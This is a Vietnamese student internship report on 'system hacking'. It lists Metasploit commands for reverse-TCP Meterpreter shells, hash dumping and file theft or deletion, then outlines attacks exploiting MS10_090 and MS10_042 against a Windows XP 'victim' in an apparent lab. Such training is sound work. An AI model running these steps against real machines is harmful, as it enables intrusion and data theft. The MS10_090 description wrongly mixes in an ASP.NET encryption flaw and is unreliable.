bao cao thuc tap tuan 2

13
BÁO CÁO THỰC TẬP TUẦN 2 (Từ ngày 20/5/2015-27/5/2015) ĐỀ TÀI: SYSTEM HACKING Giáo viên hướng dẫn: Thầy VÕ ĐỖ THẮNG Sinh viên thực hiện: TRẦN ĐĂNG KHOA

Upload: au-duong-binh

Post on 16-Aug-2015

13 views

Category:

Technology


1 download

TRANSCRIPT

BÁO CÁO THỰC TẬP TUẦN 2

(Từ ngày 20/5/2015-27/5/2015)

ĐỀ TÀI: SYSTEM HACKING

Giáo viên hướng dẫn: Thầy VÕ ĐỖ THẮNG

Sinh viên thực hiện: TRẦN ĐĂNG KHOA

MỤC LỤC

I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :................................................1

1. Câu lệnh sử dụng để tấn công:......................................................................................................1

2. Câu lệnh sử dụng để điều khiển và khai thác dữ liệu:................................................................1

II. Khai thác các lỗ hổng bảo mật:.....................................................................................................2

1. Lỗ hổng MS10_090:.......................................................................................................................2

2. Lỗ hổng MS10_042:.......................................................................................................................6

I. Làm quen các câu lệnh cơ bản thường dùng trong BackTrack 5 :1. Câu lệnh sử dụng để tấn công:

- #Username:root/password:toor : Thông tin đăng nhập- #Startx : vào giao diện đồ họa - #Dhclient –r : xóa thông số IP của máy- #Dhclient eth0 : xin lại IP cho card eth0- #Msfconsole : khởi động metasploit- >Search xxx : tìm kiếm lỗ hổng xxx- >Use x/y/z : sử dụng module , x/y/z là đường dẫn matching module- >Show options : kiểm tra các thuộc tính của mã lỗi.- >Set srvhost A : A là IP máy backtrack- >Set lhost A- >Set lport B : B là port muốn mở, B phải khác các port của hệ thống - >Set payload windows/meterpreter/reverse_tcp- >Exploit : tiêm mã độc.- >Set filename abc : chỉnh tên file thành abc- >sessions –i x : chiếm quyền điều khiển máy nạn nhân , x là id sessions

máy nạn nhân.2. Câu lệnh sử dụng để điều khiển và khai thác dữ liệu:

- >getuid : xem thông tin hệ thống- >sysinfo : xem thông tin hệ thống- >upload /root/Desktop/abc.doc C:/ : tải file abc.doc từ máy backtrack

qua ổ C máy nạn nhân- >download C:/xyz.doc /root/Desktop : tải file xyz.doc từ máy nạn nhân

về máy backtrack- >haskdump : lấy hashpass- >shell : khám phá ổ đĩa máy nạn nhân- >cd C:\ : chuyển dấu nhắc ổ đĩa- >dir : liệt kê tài nguyên trong ổ C- >md abc : tạo thư mục abc trong ổ C- >rd abc : xóa thư mục abc trong ổ C- >del abc.txt : xóa file abc.txt trong ổ C- >exit : thoát.

II. Khai thác các lỗ hổng bảo mật:1. Lỗ hổng MS10_090:

a. Giới thiệu:Các phiên bản Microsoft Internet Explorer 6, 7, and 8 cho phép kẻ tấn công thực hiện mã lệnh thông qua Cascading Style Sheets (CSS)Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra khóa giải mã trong một thời gian ngắn.

b. Cách thức tấn công:

Bước 1: khởi động metasploit

Bước 2: tìm kiếm module ms10_090

Bước 3: sử dụng module này

Bước 4: thiết lập các thuộc tính cần thiết

Set các giá trị thuộc tính cần thiết

Bước 5: tiêm nhiễm

Bước 6: lấy quyền điều khiển và xem các thông tin trên win xp

Ta tiến hành copy URL gửi qua cho máy nạn nhân. khi nạn nhân truy cập vào địa chỉ này thì máy backtrack sẽ chiếm được quyền điều khiển của máy nạn nhân

Ta nhận thấy giữa máy nạn nhân và máy attacker đã thiết lập một phiên làm việc có ID là 1. Ta tiến hành thực thi quyền điều khiển trong session này

Xem thông tin máy xp:

Ngoài ra ta còn có thể toàn quyền thao tác trên máy nạn nhân như copy file, tải file,…

2. Lỗ hổng MS10_042:a. Giới thiệu:

Lỗ hổng bảo mật trong “Help and Support Center” có thể cho phép thực hiện mã lệnh từ xa (2229593)Mã lỗi được thực thi khi người dùng xem một trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong thông báo email.

b. Cách thức tấn công:

Bước 1: khởi động metasploit

Bước 2: tìm kiếm module ms10_042

Bước 3: sử dụng module này

Bước 4: thiết lập các thuộc tính cần thiết

Bước 5: tiêm nhiễm

Bước 6: lấy quyền điều khiển và xem các thông tin trên win xp

Gửi link qua máy nạn nhân, khi nạn nhân truy cập vào địa chỉ trên bằng IE và mở help center lên. Khi đó máy nạn nhân sẽ bị điều khiển.

Chiếm quyền điều khiển máy nạn nhân, xem thông tin máy nạn nhân

Ngoài ra ta còn có thể thực hiện toàn quyền trên máy nạn nhân.